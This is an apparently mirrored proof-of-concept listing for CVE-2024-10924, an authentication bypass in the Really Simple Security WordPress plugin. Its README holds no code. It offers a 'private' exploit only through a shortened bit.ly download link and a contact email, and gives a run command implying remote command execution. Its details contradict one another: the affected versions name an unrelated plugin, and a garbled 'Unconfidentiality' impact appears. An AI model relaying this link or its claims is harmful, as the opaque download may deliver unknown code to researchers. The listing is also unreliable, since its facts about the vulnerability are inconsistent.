Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-10924 PoC — WordPress plugin Really Simple Security 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Really Simple Security 安全漏洞 (CVE-2024-10924)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Really Simple Security 9.0.0版本到9.1.1.1版本存在安全漏洞,该漏洞源于包含一个身份验证绕过漏洞。
Description
CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)
Readme
# CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)
## Overview
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This vulnerability is caused by improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. It affects installations where the "Two-Factor Authentication" setting is enabled, which is disabled by default.

## Exploit:
## [Download here](https://bit.ly/4ezeMHe)
## Details
+ **CVE ID**: CVE-2024-10924
+ **Published**: 11/16/2024
+ **Impact**: Unconfidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows unauthenticated attackers to log in as any existing user on the site, including administrators. The potential impact is severe, as it could lead to complete compromise of the WordPress site. An attacker could gain full administrative access, potentially allowing them to modify content, install malicious plugins, access sensitive information, or use the compromised site for further attacks.

## Affected Versions
AJAX Random Posts<= 0.3.3
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact
+ **For inquiries, please contact: brahmanskiy@outlook.com**
+ [Download here](https://bit.ly/4ezeMHe)
File Snapshot

[4.0K] /data/pocs/0938d81ab5b378ae61dad529803021615b0ced35 └── [1.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.